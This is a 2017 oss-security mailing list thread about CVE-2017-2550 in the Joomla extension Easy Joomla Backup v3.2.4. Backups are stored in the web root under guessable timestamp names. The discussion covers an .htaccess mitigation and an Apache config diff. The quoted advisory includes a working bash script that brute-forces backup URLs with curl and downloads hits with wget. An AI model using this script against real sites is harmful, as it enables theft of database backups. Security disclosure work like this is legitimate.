[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2017-09-28 16:05:40
Message-ID: 28E19EE5-7EC0-4712-80CE-5D2AD4C4B932 () me ! com
[Download RAW message or body]
Hi David,
This is correct, hardened shared hosting platforms won't be vulnerable to this attack.
I've now updated the configuration on my lab Ubuntu system by changing apache2.conf:
# diff -Nur orig apache2.conf
--- orig 2017-09-28 12:02:13.674668975 -0400
+++ apache2.conf 2017-09-28 11:47:50.898322778 -0400
@@ -163,7 +163,7 @@
<Directory /var/www/>
Options Indexes FollowSymLinks
- AllowOverride None
+ AllowOverride All
Require all granted
</Directory>
Thanks,
Larry
> On Sep 28, 2017, at 9:09 AM, David Jardin <david.jardin@community.joomla.org> wrote:
>
> It's worth to mention that the extension has a default .htaccess file with a „deny from \
> all" in the backup directory, that will mitigate the described attack on pretty much any \
> standard shared-hosting platform that I'm aware of.
>
>
>
> Am 28. September 2017 um 14:37:20, Larry W. Cashdollar (larry0@me.com) schrieb:
>
> > Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
> > Author: Larry W. Cashdollar, @_larry0
> > Date: 2017-09-07
> > CVE-ID:[CVE-2017-2550]
> > Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
> > Vendor: kubik-rubik
> > Vendor Notified: 2017-09-07
> > Vendor Contact:
> > Advisory: http://www.vapidlabs.com/advisory.php?v=200
> > Description: Easy Joomla Backup creates 'old-school' backups without any frills.
> > Vulnerability:
> > The software creates a copy of the backup in the web root. The file name is easily \
> > guessable as it's just a time stamp:
> > http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip \
> >
> > Exploit Code:
> > • #!/bin/bash
> > • #Larry W. Cashdollar, @_larry0 9/7/2017
> > • #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
> > • #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
> > • MONTH=09
> > • DAY=07
> > • YEAR=2017
> > • Z=0
> > • #May need to set the DOMAIN to $1 the target depending on how WP is configured.
> > • DOMAIN=192.168.0.163
> > •
> > • echo "Scanning website for available backups:"
> > • for y in `seq -w 0 23`; do
> > • for x in `seq -w 0 59`; do
> > • Y=`echo "scale=2;($Z/86000)*100"|bc`;
> > • echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b \
> > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b \
> > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%" \
> > • for z in `seq -w 0 59`; do • Z=$(( $Z + 1 ));
> > • CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; \
> > • RESULT=`curl -s --head $CPATH|grep 200`;
> > • if [ -n "$RESULT" ]; then
> > • echo ""
> > • echo "[+] Location $CPATH Found";
> > • echo "[+] Received $RESULT";
> > • echo "Downloading......";
> > • wget $CPATH
> > • fi;
> > • done
> > • done
> > • done
> > • echo "Completed."
> --
> Kind Regards,
> David Jardin
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic